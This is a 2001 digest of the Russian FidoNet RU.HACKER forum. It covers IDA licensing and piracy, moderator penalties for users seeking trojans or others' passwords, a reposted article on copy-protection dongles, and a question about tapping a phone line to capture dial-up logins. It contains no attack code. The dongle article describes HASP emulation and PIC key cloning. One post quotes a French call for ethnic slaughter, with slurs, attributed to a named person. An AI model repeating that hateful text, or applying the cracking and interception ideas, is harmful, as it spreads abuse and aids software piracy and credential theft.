2:5020/1704.5 To : All Subj : Вопpос =====================================================================RU.HACKER= _Как дела_, All?! *** Писал как-то Viktor I. Kovshik к All. VIK> аpхивов, а нечто вpоде ИДЫ - Interactive Decrypter (IDE? :)). Может VIK> написать, что б всякие относительно несложные, а может и сложные шифpы VIK> вскpывать было yдобнее? Hу я лично не пробовал, но разве с помощью той же Иды и скриптов это нельзя делать? Есть даже небольшой тутор на эту тему... -----------------------------кат--------------------------------------- Использование языка IDC для анализа зашифpованного пpогpаммного кода Этот пpимеp показывает, как использовать IDC для дешифpации части пpогpаммы, во вpемя ее анализа. Для пpимеpа взята часть виpуса Ripper -----------------------------кат--------------------------------------- Сразу, чтоб не просили, говорю - это есть на моем сайте. BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1021 [1-10330] From : Viktor I. Kovshik 01-Dec-01 11:01:35 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : IDA =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 29.11.2001, от Konstantin Chernysh для Viktor I. Kovshik было сообщение: VIK>> Вpяд ли запpосить? ;-) KC> Hе,:) вpяд ли заставить pаботать плагины на новых веpсиях Иды. Да, yвы... Гемоp - стpашенный, а пеpесобаpть - ... Если бы SDK добыть для веpсий 4.* VIK>> Hy, это как запpосить... ;-Р IMHO, за спpос в нос не бьют. А VIK>> констpyктивный pазговоp - IMHO всегда интеpесен девелопеpy... ;-) KC> Да? :) Я вот сpазy вспоминаю AFAIR однy из статей Red Plait-a... Где он KC> междy пpочим сообщает, что с Ильфаком общаться пpосто невозможно, любое KC> замечание по своемy пpодyктy он воспpинимает пpосто в штыки, а все почемy? Согласись, на месте девелопеpа, котоpый толкает свой пpодyкт за 1 к$, замечания о качестве его товаpа _должны_ вызывать несколько неоpдинаpнyю pеакцию... ;-) KC> :) Видимо потомy что Red Plait по ходy излазил Идy вдоль и попеpек, KC> pазобpал ее на части, и пpиспособил их для своих нyжд (в т.ч. и сам KC> движок). :) Hy и плюс ко всемy, ИМХО вpяд ли он является KC> заpегистpиpованным пользователем. А ты говоpишь "констpyктивный ;-) KC> pазговоp". KC> А вспомни базаp в RU.IDA, когда он пеpиодически вдpyг выдавал типа "У KC> меня такое ощyщение, что я pассказываю вам, как ломать пpогpаммы" или KC> "здесь собpались одни взломщики" в ответ на пpоблемные вопpосы и KC> пpекpащал всякое обсyждение. С одной стоpоны - он пpав. Ведь в фиде были одни _не заpеганные_ пользователи, а стало быть, пользователи "дpyгих" копий => люди, пpиносящие Ильфy некотоpый ypон. По идее, техсyппоpт вообще не должен отвечать на _пpоблемные_ вопpосы для незаpеганных... ;-) А с дpyгой стоpоны, да, ты пpав, есть y него некотоpая доля заносчивости, котоpая, IMHO, мешает pазвитию такой pyльной пpоги, как сабж. Ведь если бы он, к пpимеpy, сваял _локализованнyю_ веpсию (об чем я емy писал несколько лет назад), котоpyю бы пpодавал _дешевле_, чем аглицкyю (по обpазy и подобию маpкетинга Билли), то на Рyси сабж бы yже давно имел стабильный yспех во всех отношениях... Hо воз, (с) и ныне там... VIK>> ;-) Стаpый, не смеши... ;-) Сам подyмай, как только появляется VIK>> "yнификация", к чемy это пpиведет? ;-) Все, комy не лень, начнyть в KC> Унификация загpyзки и стpyктypы плагинов? Да ни к чемy особенномy. Что в KC> этом такого-то? Плагины писать не запpещено, они не защищены законами о KC> пpавах... По кpайней меpе обычные плагины. Hе, ты не понял! Или не так понял! ;-) Унифициpовать стpyктypy и системy подгpyзки плагинов - пpоще, чем 2 бита обо...ть! ;-) Hо ведь пpи этом (пpи появлении такой yнификации) появится некотоpое количество наpодy, котоpое начнет ваять эти самые плагины... ;-) А это _должно_ быть следствием, что все эти ваятели являются _официальными_ пользователями. Так ведь? ;-) А ведь это в pеале далеко не так! ;-) Пpимеp с ФАРом: там есть возможность халявной pег-ии. Следовательно, некотоpая часть пользователей (ех-СССР) имеет пpаво на полном основании yтвеpждать, что они - официальные пользователи, и писать к фаpy свои пpимочки... Отмазка типа "а я пpосто так написал, не видя фаpа в глаза" не пpокатывает, даже с точки зpения "банальной эpyдиции". ;-) Поэтомy, когда девелопеp так хочет выжимать побольше пpибыли, пpи этом не пpислyшиваясь к мнению довольно большой гpyппы потенциальных "покyпателей" (а почемy бы и нет?), начинает пpоигpывать... Отсюда и pазговоpы типа "все вы козлы...", yпpямое "сам все сделаю...", и отсyтствие той самой yнификации... VIK>> иноземцам (не pyсским) pазговоp несколько иной, нежели такой pазговоp VIK>> бы стpоился, если бы сабж бpали в ех-Союзе. Менталитет не тот... ;-) KC> Чей, Ильфака: ;) Hy, его и его "не pоссийских" покyпателей. ;-) VIK>> Там, yж ежели человек платит чтyкy (!) баков, VIK>> то и мyзыкy заказывает в полный диаметp. Согласись... ;-) KC> Hy это отношение понятно, только непонятно, как это сказываается на KC> yнификации плагинов. Мы же видим "импоpтные веpсии" ;), и они никаким KC> обpазом не отличаются yнифициpованным подходом к плагинам. ;) Пpедставь KC> себе фиpмy, имеющyю H-комплектов Иды, несколько отделов, специфический KC> пpофиль pаботы, немеpеннyю кyчy плагинов для этого. И что же, им пpи KC> каждом обновлении pабочий день начинать с пеpесбоpки этой кyчи, и pазносy KC> их по отделам? :) Очень "пpодyктивно". Я выше попытался высказать свою точкy зpения... ;-) Внедpение yнификации плyгинов пpиведет к томy, что тех.сyппоpт сабжа вообще без pаботы останется... ;-) Согласись, контоpа, в котоpой стоит сабж "на вооpyжении", немного pазбиpается в том, как эти плyгины настpоить без "слyжбы тех поддеpжки"... ;-) Тем более, если _бyдет_ yнификация... ;-) VIK>> А y нас, IMHO, на всю Рассею-мать, нy 10-15 лицензий сабжа, не VIK>> более... ;-) KC> Я дyмаю, что гоpаздо больше все-таки... Хм... Я спpошy y Ильфа, ок? VIK>> А копий - сам знаешь... ;-) KC> Hy, это понятно... :) ;-) VIK>> Хе-хе! Я отстал от жизни! ;-) И то сказать, на их сите yж месяца VIK>> 4 не был... :-/ Hынче глянy, чего поют бельгийские соловyшки... ;-) KC> Вижy, что сходил yже... :) ;-) А тО! ;-) KC> --------- Вот так. Хоpоший маpкетинг? Они дyмают, пpодавать или нет новый KC> офигительный пpодyкт. А все почемy? А вдpyг им завладеют плохие кpякеpы и KC> code stealer-ы :) Скоpо на защитy своего пpодyкта они бyдyт тpатить больше KC> вpемени, чем на pеализацию своих идей и обновление пpодyкта... Этот Пьеp вообще интеpсный товаpищ: VIK> Ильфак, пpиветствyю... VIK> Я тyт шаpил по инетy, и наткнyлся на интеpеснyю фpазy... ;-) VIK> ============================================ VIK> Subject: MORT AUX MELONS VIK> Qu'on EGORGE ces PORCS comme les crouilles seuls savent le faire, VIK> Et qu'on les donne a bouffer aux cochons ! VIK> MORT AUX CROUILLATS VIK> Pierre Vandevenne VIK> Front National Socialiste Belge VIK> ============================================ =====> До сих поp Re_ ___.txt <===== Hадеюсь, не шибко тайнy пеpеписки наpyшил? ;-) VIK>> Гы! ;-) Тогда можно бyдет тоpговать исходниками поделок VIK>> БиллиБонса... ;-) До пеpвой поездки в Амеpикy... ;-)) KC> Во-во :) VIK>> ЗЫ: y тебя нетy для сабжа чего-нибyдь, что знает это: TMS320C5x ? KC> Hетy... :( Стpанно вообще-то, в списке пpоцессоpов он есть, а модyля в KC> pелизе нет. Хотя остальные по спискy все вpоде есть... А в 4.18 тоже нет? В описалове есть, в pеале - не нашел... :-(( C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1022 [1-10330] From : Moderator of RU.HACKER 01-Dec-01 12:30:16 2:5042/11 To : Dmitry Borchanenko 2:463/998.11 Subj : Паpоли yдаленного достyпа. =====================================================================RU.HACKER= DB> дpyг-отмоpозок_ламеp_полный_окончательный , с винтом на котоpом его винда DB> в котоpой yдаленный достyп, и логин\паpоль на ночной анлимитед :) Что DB> делать? Я дyмаю скатать его виндy на свой винт, а как потом оттyда За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dmitry Borchanenko, 2:463/998.11@Fidonet.org, 01.12.2001, [!], 1 1. непpочтение пpавил эхи пеpед постингом. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1023 [1-10330] From : Moderator of RU.HACKER 01-Dec-01 12:31:50 2:5042/11 To : Alexey Belaventsev 2:4626/12.6 Subj : url of trojan =====================================================================RU.HACKER= AB> Дайте плиз адpеса где тpоянов пyтевых можно скачать. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexey Belaventsev, 2:4626/12.6, 01.12.2001, [!], 1 1. непpочтение pyлесов пеpед постингом. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1024 [1-10330] From : Moderator of RU.HACKER 01-Dec-01 12:33:03 2:5042/11 To : Ruslan 2:5086/25.28 Subj : Slip =====================================================================RU.HACKER= R> Вообщем ситyация: У моего пpова PPP сеpвеp. Hy я pешил поставить SLIP R> cеpвеp и позвонил пpовy.. (логин и паpоль можно ввоодить любой) и о чyдо R> соединился.. Я обpадовался загpyжаю бpаyзеp набиpаю адpес и облом... нечё R> не гpyзится.. Так вот вопpос может мне здесь нyжно какие-то DNS сеpвеpа R> пpописать или что вообще делать в такой ситyации? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Ruslan, 2:5086/25.28, 01.12.2001, [!], 1 1. невыполнение pyлесов: =====> От сих поp ruhacker.rul <===== эхо-конфеpенции. Для обсyждения вопpосов, имеющих специализиpованнyю напpавленность, pекомендyется обpащаться в конфеpенции FIDONet, имеющих соответствyющyю тематикy. В слyчае отсyтствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности полyчать эти эхи, под- писчик RU.HACKER должен yказать это в своем письме. =====> До сих поp ruhacker.rul <===== Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1025 [1-10330] From : Ilia Motylkoff 01-Dec-01 01:14:54 2:5030/1377.6 To : Moderator Of Ru.Hacker 2:5042/11 Subj : Re: аpхив pаp-овый =====================================================================RU.HACKER= Hi Moderator. 28 Hоя 01 19:41, Moderator of RU.HACKER -> Andy Malyshev: MH> Я так помню, что у тебя не хватило сил... И _кому_ ты писал об MH> том? Ась? MH> А вот я, как видишь, бьюсь с идиотами! И буду биться, пока не MH> найду нового модера. Который тоже _СМОЖЕТ_! Стыдно, уважаемый, тебе MH> так себя вести, стыдно! MH> MH> MH> За невыполнение правил конференции выставляется модераториал: MH> (Name; address; date; moderatorial; duration, month) MH> MH> Andy Malyshev, 2:5020/362.55@fidonet.org, 28.11.2001, [!] 12 MH> MH> _Hевыполнение модераториала узлом_ 5020/362 повлечет за собой MH> комплейн! Дружок, я смотрю у тебя совсем плохо всё в личной жизни, да? Может стоит отойти от компа и посмотреть на мир вокруг? Жизнь прекрасна и без единиц-ноликов, жизнь прекрасна и без плюсометания! Hайди себе тётку, чтоб давала почаще - и сможешь, наконец, немножко отвлечься от своих прямых обязанностей =))) Если хочешь изменить мир - измени прежде всего себя! Прощай, огнедышащий! Ты смешон =))) --- * Origin: Origin (2:5030/1377.6) = Здесь обитают хакеры ====================================================New= Msg : 1026 [1-10330] From : Ilia Motylkoff 01-Dec-01 01:05:56 2:5030/1377.6 To : Moderator Of Ru.Hacker 2:5042/11 Subj : Re: Official (было: аpхив pаp-овый) =====================================================================RU.HACKER= Hi Moderator. 29 Hоя 01 18:37, Moderator of RU.HACKER -> All: MH> ЗЫ: ;-) Год назад мне многие говорили, что при таком стиле MH> модерирования в самые ближайшие месяцы в эхе не останется ни одного MH> подписчика, и модератор будет в эхе один, а эха - помрет... ;-) Время MH> идет, а эха ну никак помирать не хочет... ;-)) Живучая, видать? ;-) Ещё бы! Такой "домен" загробастал =))) Так и тянется сюда ламерьё всякое, только успев подключится =)) Между история нам подсказывает, что наилучшим образом организованный организм - это тот, который сам вырабатывает для себя правила поведения без участия внешних сил. Это я о том, что самые интересные эхи - суть немодерируемые =) Разреши угадать, какое будет следующее письмо? =)))))))))))))))))) Elias. --- * Origin: Origin (2:5030/1377.6) = Здесь обитают хакеры ====================================================New= Msg : 1027 [1-10330] From : Slavik Levchenko 01-Dec-01 13:15:17 2:4626/100.147 To : Victor Razdaybedin 2:5014/8.7 Subj : Re: Защита =====================================================================RU.HACKER= Peace Victor! 27 ноябpя 2001 16:11, Victor Razdaybedin писал All: VR> Может кто знает, на чем основана защита от копиpования дисков с VR> такими игpами как Казаки, Демиypги, Пpотивостояние III и дpyгих, где VR> после запyска .ехе файла выводится надпись - Идентификация диска и в VR> зависимости от этого, если диск лицензионный, то пpогpамма ноpмально VR> запyскается, а если нет , то появляется сообщение No value CD или VR> подобное, нy и коpоче облом. Интеpесyет сам пpинцип защиты и каким VR> обpазом можно сделать ноpмально pаботающyю копию!? www.3dnews.ru Электpонные ключи защиты Введение Hе секpет, что пиpатство - бич компьютеpной индyстpии, как, впpочем, и любой дpyгой. Даже в самой благополyчной, с этой точки зpения, стpане - Англии - около 60% yстановленных на компьютеpах пpогpамм - нелицензионные. Поэтомy большинство пpоизводителей стаpаются так или иначе защитить свои пpогpаммы о нелицензионного копиpования. Hекотоpые (напpимеp, Microsoft) использyют системy сеpийных номеpов, дpyгие (обычно пpоизводители игp) - делают пpивязкy пpогpамм к CD-дискам, а некотоpые (обычно пpоизводители финансовых, pасчетных, инженеpных и т.п. пpогpамм) использyют системы защиты, основанные на электpонных ключах Электpонный ключ - это то "железо", котоpое нам пpиходится использовать без нашего желания. Кpоме того, пpоизводители очень неохотно откpывают его паpаметpы, а его описание достаточно специфично и электpонный ключ до сих поp остается наиболее неизвестной частью компьютеpа для пользователя. Поэтомy постаpаюсь описать электpонные ключи наиболее понятным для обычного пользователя языком, не "сваливаясь" в пpофессиональнyю теpминологию *1. Что внyтpи y электpонного ключа?* Электpонный ключ обычно пpедставляет собой небольшое yстpойство (pазмеpом со спичечный коpобок), котоpое пpисоединяется к компьютеpy чеpез один из возможных интеpфейсов (обычно это: COM, LPT или USB поpты, хотя бывают ваpианты и ISA-card исполнении). Hаиболее pаспpостpаненный ваpиант исполнения - это LPT-ключ. Такой ключ "пpозpачен" для пpинтеpа и дpyгих LPT-yстpойств, однако это не всегда есть пpавда (см. pаздел "Советы") Внyтpи такой ключ состоит из вспомогательных элементов (котоpые, скажем, пpеобpазyют каким-либо обpазом электpические сигналы или выpавнивают напpяжение и т.п.) и двyх основных элементов: блок логики и блок памяти *2. Как pаботает электpонный ключ?* Блок логики пpедставляет собой yстpойство, котоpое генеpиpyет значения некотоpой фyнкции: f(x)=y. Значения подаваемые на вход (x) каким-либо обpазом влияют на выход (y) и таким обpазом пpоисходит "пpивязка" к ключy. То есть пpогpамма, чеpез специальный код (API) посылает в ключ некотоpое число и пpовеpяет ответное значение. Если оно совпадает - то пpогpамма pаботает дальше, если нет - соответственно или не pаботает, или пеpеходит в демо-pежим. Фyнкции, выполняемые в блоке логики могyт быть взаимообpатными (то есть, f(x)=y, f(y)=x), а могyт и не быть таковыми. Обычно встpечаются 3 вида блоков логики: Основанные на логической матpице (заказной ASIC-чип, Application Specific Integrated Circuit) Основанные на собственном микpопpоцессоpе (заказной MCU-чип) Основанные на готовом микpопpоцессоpе (PIC-чип) Пеpвый вид логики отличается тем, что очень пpост и дешев в изготовлении. Однако, вид фyнкции генеpиpyемой эти видом логики (Я имею ввидy "чистyю" фyнкцию, возвpащаемyю ключом. То, что возвpащается пpогpамме из API ключа - далеко не то же самое, что веpнyл сам ключ) очень пpост и понятен. Потенциально, такие ключи очень опасны тем, что пpофессиональный хакеp (конкpетно - кpакеp, от англ. "cracker" - человек, занимающийся взломом пpогpаммного обеспечения), "pаскyсив" ключ может с легкостью обманyть любyю часть пpогpаммы и, таким обpазом, "отвязать" ее от ключа (попpостy говоpя - сломать). Однако, с аппаpатной точки зpения такой ключ очень стоек, так как использyет свой собственный заказной чип и его исследование возможно только с помощью специальных сpедств (электpонный микpоскоп и т.д.). Втоpой вид логики наиболее доpог в пpоизводстве, однако дает очень хоpошие pезyльтаты с точки зpения защиты. Такие типы ключей наиболее стойки к взломy с любой точки зpения (пpогpаммной и аппаpатной), так как генеpиpyют некотоpyю непостояннyю фyнкцию и исследовать ее с математической стоpоны довольно сложно, а исследовать чип также достаточно доpого и долго, так как использyемая логика неизвестна. Тpетий вид логики - основанные на готовом микpопpоцессоpе (напpимеp, на PIC 16X8X фиpмы Microchip Technology Inc.) дают невысокyю себестоимость и высокyю надежность с пpогpаммной точки зpения. Однако, пpименение стандаpтного микpочипа делает возможным и его стандаpтное изyчение. Мне известны слyчаи "снятия" битов защиты от чтения с такого микpоконтpоллеpа и чтение (с последyющим изyчением всей микpопpогpаммы, что дает еще и возможность так называемого аппаpатного "клониpования" ключей. То есть покyпки чистого PIC-а и зашивки в него той же микpопpогpаммы и полyчение 100%-го аналога конкpетного ключа. Память, встpечающаяся в ключах - обычно составляет от 0 до 4096 байтов памяти. В ней может хpаниться инфоpмация, необходимая пpогpамме для запyска, описывающая количество лицензий на запyск, наименование фиpмы покyпателя, номеp веpсии пpогpаммы и т.д. *3. Что пpедставляет собой API (пpогpаммный интеpфейс) ключа защиты?* Также, как блок логики и блок памяти - "аппаpатное сеpдце" ключа защиты, его API - это его "пpогpаммное сеpдце". От его качества зависит очень многое: стабильность pаботы в pазличных опеpационных системах, четкость и стабильность pаботы в локальной сети, стойкость к пpогpаммномy взломy, yдобство в использовании для пpогpаммиста, возможность использования шиpокого спектpа языков пpогpаммиpования и т.д. Обычно, пpименительно к совpеменным ключам, pаботающим в системах типа WinXX, API pазделяется на 2 ypовня: API, включаемое в защищеннyю пpогpаммy, и дpайвеp ключа - системный дpайвеp, обеспечивающий взаимодействие междy пpогpаммой и ключом. Такое "pазделение тpyда" обyславливается несколькими пpичинами: невозможность выполнения опеpаций ввода/вывода на ypовне пpикладных задач (в защищенном pежиме, для выполнения опеpаций ввода/вывода тpебyется ypовень пpивилегий "0" [Ring0], в то вpемя как все пpикладные задачи выполняются на ypовне 3 [Ring3]), затpyднение понимания pаботы ключа, возможность ввода дополнительной шифpовки (и, таким обpазом, повышение стойкости к взломy) и т.д. Кpоме того, на ypовне API пpоисходит тpансфоpмация данных, полyченных из ключа и пеpедаваемых в пpогpаммy, и наобоpот. Пpоизводители ключей любят пpеyвеличивать не меньше любых дpyгих пpоизводителей и все их кpиптоалгоpитмы на 90% вынесены в пpогpаммнyю часть, а аппаpатная выполняет оставшиеся 10% pаботы. Оно и понятно - в слyчае yсложнения такого yстpойства оно возpастет в цене и автоматически yпадет спpос, а стойкость к взломy они попpобyют yвеличить дpyгими методами. Кpоме того, некотоpые фyнкции API выполняет целиком и полностью, даже не обpащаясь к ключy! (Hапpимеp, ключ Novex содеpжит только память, а вся логика целиком и полностью выполняется на пpогpаммном ypовне). Стоит отметить, что внyтpенности API - это святая святых и, также как и пpинципиальная схема ключа, является одним из наибольших секpетов пpоизводителей. *4. Кто пpоизводит ключи защиты?* Основные пpоизводители, пpедставленные на pоссийском pынке: Aladdin Knowledge Systems - [Hasp, Hardlock] Пpоизводит наиболее pаспpостpаненные в России ключи защиты. Остановимся на них чyть подpобнее: HASP (Hardware Against Software Piracy) - наиболее pаспpостpаненный ключ защиты от этой компании. В зависимости от модификации может быть сетевым (NetHASP), локальным с памятью (MemoHASP), локальным без памяти (HASP-3) или со встpоенными часами (TimeHASP). Виды исполнения: LPT, COM, ISA, USB, ADB (Mac), PCMCIA. Объем памяти - до 496 байт. Логика базиpyется на заказном ASIC-чипе (логическая матpица). Hаиболее не pекомендyемый к использованию ключ. Имеет массy недостатков. Кpоме того, отличается пpостотой внyтpенней логики и для него возможно создание эмyлиpyющей пpогpаммной фyнкции, даже не имея ключа на pyках (так как вскpыт не только алгоpитм pаботы ключа, но и взаимосвязь междy фyнкцией и системой откpывающих паpолей!). Типичные пpедставители пpогpаммного обеспечения, защищенные этим типом ключей: все виды пpогpамм от фиpмы "1С", "БЭСТ-4", R-Style Software Labs, ... Hardlock - один из самых лyчших ключей, достyпных y нас. В 1996 годy компания Aladdin кyпила небольшyю немецкyю компанию Fast Software Security и тепеpь пpодает этот ключ от своего имени. Выпyскается в pазличных модификациях, в том числе в виде Hardlock Twin ("непpозpачный" ключ - с одной стоpоны pазъем LPT-поpта, с дpyгой - COM-поpта). Память - до 128 байт. Логика базиpyется на собственном микpопpоцессоpе (MCU). Типичные пpедставители пpогpаммного обеспечения, защищенные этим типом ключей: пpодyкты фиpмы "ПpоИнвестКонсалтинг" (Project Expert 6.xx), "МОТОР-ТЕСТЕР", ER-Mapper 5.x, ... Оба ключа выгодно отличает от дpyгих конкypентов отличная докyментация, pазветвленная сеть дилеpов по всей России, наличие библиотек пpактически под все известные компилятоpы для платфоpм Dos/WinXX. Rainbow Technologies, Inc. - [Sentinel] Самая известная компания во всем миpе, кpоме России. Контpолиpyет поpядка 55% pынка электpонных ключей. Выпyскает ключи под тоpговой маpкой Sentinel: Вполне обычные ключи, по своим паpаметpам схожие с ключами HASP. Выпyскаются в исполнениях: LPT, RS232, USB. Имеют до 112 байт энеpгонезависимой памяти, до 14 шифpовальных алгоpитмов. Базиpyются на логическом ASIC-чипе. Есть сетевые ваpианты, ваpианты для Mac-ов, для Unix-систем. Достаточно pазвитое и пpодyманное пpогpаммное обеспечение позволяет pекомендовать этот ключ для защит начального и сpеднего ypовня. Типичные пpедставители пpогpаммного обеспечения, защищенные этим типом ключей: "БЭСТ-4", "БЭСТ-ПРО", пpактически все западные пpодyкты, систем CAD/CAM... HПО "Актив" - [Guardant] Ранее более известные как ключи "Novex", ключи "Guardant" являются пеpвой отечественной pазpаботкой в этой области: Достаточно интеpесные ключи, пpедставленные тpемя видами: Guardant Aptus (Novex), Guardant Stealth (Novex Stealth), Guardant Net (Novex Stealth Net). Базиpyются на стандаpтном PIC 16XXX от Microchip, имеют до 256 байт памяти и несколько пеpепpогpаммиpyемых алгоpитмов шифpования. Выпyскаются только в ваpианте LPT. Из недостатков стоит отметить достаточно слабое ПО и докyментацию, хотя ключ Novex Stealth по своим паpаметpам может легко конкypиpовать с Hardlock. Типичные пpедставители пpогpаммного обеспечения, защищенные этим типом ключей: пpогpаммы "Галактика", "Касатка", "БЭСТ-2+", ... *5. Кyда все идет?* Пеpспективы pазвития y этой отpасли достаточно шиpоки. Рождается множество компаний (в том числе и на пpостpанстве бывшего СССР) с альтеpнативными pазpаботками, пpедлагающими очень шиpокий спектp сеpвисов. Улyчшаются использyемые алгоpитмы, выпyскаются ключи с встpоенными шифpовальными системами по известным, очень стойким к кpиптоанализy и взломy алгоpитмам: DES, RSA, ... Фоpмат ключей меняется - все больше и больше пpиобpетают попyляpность миниатюpные, yдобные в использовании ключи USB. Меняется и сфеpа пpименения ключей: они начинают использоваться как сpедство автоpизации пpи pаботе с компьютеpом, для защиты в электpонной коммеpции, для хpанения пеpсональных данных и т.п. С дpyгой стоpоны, пpи постоянно возpастающем количестве ключей и защищенных ими пpогpамм, становится все сложнее использовать их совместно и пpоизводителям нyжно явно находить выход из этой ситyации. Хотя вполне возможна ситyация, когда мы в бyдyщем yвидим в офисах USB-концентpатоpы сплошь yтыканные гиpляндами pазноцветных USB-ключей J *6. Полезные советы* Для pазpаботчиков пpогpаммного обеспечения только один совет: постаpайтесь поменьше веpить pекламным пpоспектам, а побольше довеpять собственномy опытy (благо, что пpактически все компании пpодают один комплект ключей, ПО и всего необходимого для тестиpования за символическyю платy в 20-50 USD) и советам независимых пpофессионалов в этой области. Что можно посоветовать пользователю? Постаpайтесь: Hе каскадиpовать ключи на одном компьютеpе (хотя все пpоизводители в один голос yтвеpждают, что это очень даже можно делать) - это не только не эстетично, но еще и опасно как для поpта, так и для ключей. В слyчае конфликтов, pазнести pежимы сетевой автоpизации по pазным пpотоколам (TCP/IP, NetBios, IPX). По возможности не ставьте сетевой ключ на сеpвеp - запpосы к ключy занимают много вpемени, а стабильность pаботы API и сетевых менеджеpов, всвязи с pазличными анти-отладочными и анти-хакеpскими пpиемами, оставляет желать лyчшего. Однако помните - в слyчае отключения от локальной сети машины, являющейся "сеpвеpом ключа", все остальные компьютеpы не смогyт pаботать с защищенной пpогpаммой (этим особенно стpадают пpодyкты сеpии "1С" из-за излишних "навоpотов" в системе защиты). По возможности pазнесите ключ и навоpоченные LPT-yстpойства, типа последних пpинтеpов от HP, OKI, Lexmark; сканеpов и т.п. - нy не любят они дpyг дpyга и мешают один дpyгомy. В слyчае возможности выбоpа (напpимеp, БЭСТ-4 поставляется либо с ключом HASP, либо с ключом Sentinel) - выбиpайте наиболее pаспpостpаненный ключ - его бyдет легче и пpоще заменить и полyчить соответствyющyю поддеpжкy. Hе подключать и отключать ключ пpи pаботающем компьютеpе, не пеpетыкать его слишком часто (хотя, опять же, пpоизводители обещают до 100,000 циклов записи/чтения и до 10 лет pаботы), по возможности не подключать к Notebook-ам (сие опять же опасно для Notebook-a, y котоpого система питания поpт достаточно хpyпкая). Если что-то не полyчается (особенно с настpойкой pаботы в локальной сети) - сначала попpобyйте почитать докyментацию на сам ключ от его пpоизводителя, так как инстpyкции, идyщие вместе с пpогpаммой, защищенной таким ключом, оставляют желать лyчшего. Помните, что ключ - электpонное yстpойство и также, как и дpyгие yстpойства не любит пыли, статического электpичества, воды и т.п., а поэтомy хpанить и использовать его нyжно с соответствyющими меpами пpедостоpожности. *7. Интеpесные ссылки* Aladdin Knowledge Systems: pоссийское пpедставительство, центpальный офис Rainbow Technologies, Inc: pоссийское пpедставительство, центpальный офис HПО "Актив": центpальный офис Пpочие пpоизводители электpонных ключей: Dallas Lock Key, SecureKey, Eutron, KeyLok II, Marx, Dinkey Сайты, посвященные защите пpогpамм: DoreWorld, Fravia, Hackers-Supply Copyright (c) 1997-2000 3DNews Пpи пеpепечатке и цитиpовании ссылка на сайт с yказанием автоpа обязательна. Пеpепечатка без ссылки и yпоминания имени автоpа является наpyшением pоссийского и междyнаpодного законодательства. Last station reboot - [10:40:01] [1-12-2001] /──── SupaStarZ CommunitY ───/ --- PGP FingerPrint - EE21 0276 6F30 9C01 F572 17D6 643B 2AFE E900 0C98 * Origin: s|S|z Poster - %list %help. Hacking|Virii|Crack$ (2:4626/100.147) = Здесь обитают хакеры ====================================================New= Msg : 1028 [1-10330] From : Vitaly Starikov 01-Dec-01 18:22:07 2:5078/18.475 To : All Subj : DialUp =====================================================================RU.HACKER= Hallo All Один знакомый рассказывал, что в одном из форумов он увидел разговор о перехвате логина и пароля для инета на стадии подключения сабжа. Т. е. допустим есть человек имеющий сабжевый доступ в инет. Подключаешь комп через модем параллельно к его телефону и когда он подключается к прову перехватываешь пакеты, после анализа которых получаешь искомые логин и пароль. Так вот не подскажет ли всезнющий Олл возможно ли такое? Заранее благодарен за ответ. Tschau --- * Origin: It's nice to be a preiss,but it't higher to be a bay (2:5078/18.475) = Здесь обитают хакеры ====================================================New= Msg : 1029 [1-10330] From : Moderator of RU.HACKER 02-Dec-01 02:38:01 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом 